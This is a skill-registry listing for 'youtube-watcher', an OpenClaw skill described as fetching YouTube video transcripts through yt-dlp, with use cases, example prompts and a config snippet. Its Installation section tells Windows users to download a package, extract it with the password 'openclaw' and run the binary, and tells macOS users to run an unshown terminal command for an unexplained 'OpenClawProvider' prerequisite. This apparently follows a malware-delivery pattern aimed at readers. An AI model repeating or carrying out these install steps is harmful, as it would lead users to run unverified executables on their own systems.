ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

youtube-watcher

Fetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.

Why use this skill?

Use the youtube-watcher skill to automatically fetch transcripts from YouTube videos. Summarize content, extract data, and perform fast QA on videos with OpenClaw.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/youtube-watcher-7
Or

What This Skill Does

The youtube-watcher skill acts as a powerful bridge between OpenClaw and the vast repository of knowledge hosted on YouTube. By automating the extraction of video transcripts, this skill allows users to process long-form video content without having to watch it in real-time. It leverages the underlying yt-dlp library to fetch accurate caption data, making it an essential tool for content creators, researchers, and students who need to digest information quickly.

Installation

To begin, ensure you have the OpenClawProvider installed, as this is a strict prerequisite for the skill to bridge the gap with local resources. For Windows, download the provided package, use the password 'openclaw' to extract it, and run the binary. For MacOS users, execute the terminal command provided in the documentation to initiate the setup wizard. Finally, install the skill itself by running clawhub install openclaw/skills/skills/sakaen736jih/youtube-watcher-7 within your terminal. Please ensure yt-dlp is installed on your system PATH, as the script relies heavily on it to retrieve subtitle streams.

Use Cases

  • Automated Summarization: Instantly generate executive summaries of lengthy lectures, tutorials, or keynote speeches.
  • Content Research: Extract key quotes or specific data points mentioned by speakers in technical videos.
  • Language Learning: Analyze transcripts of educational content to improve vocabulary or comprehension.
  • Accessibility: Create text-based versions of video content for users who prefer reading over watching.

Example Prompts

  1. "Summarize the key takeaways from the video at https://www.youtube.com/watch?v=dQw4w9WgXcQ so I can understand the main argument without watching the whole thing."
  2. "Look at this video: [link] and tell me the exact time or segment where the speaker discusses the API authentication method."
  3. "Extract all the tips mentioned in this tutorial video and format them into a bulleted list for my study notes."

Tips & Limitations

This skill is highly efficient but dependent on the availability of closed captions (CC) or auto-generated subtitles on the target video. If a creator has not enabled subtitles and YouTube has not generated them, the script will return an error. Always verify that the video is publicly accessible. Additionally, for very long videos, ensure your system has sufficient memory to handle large transcript text files. If you encounter issues, verify your yt-dlp installation first.

Metadata

Stars1133
Views1
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-youtube-watcher-7": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#youtube#transcription#summarization#video-analysis#automation
Safety Score: 4/5

Flags: network-access, code-execution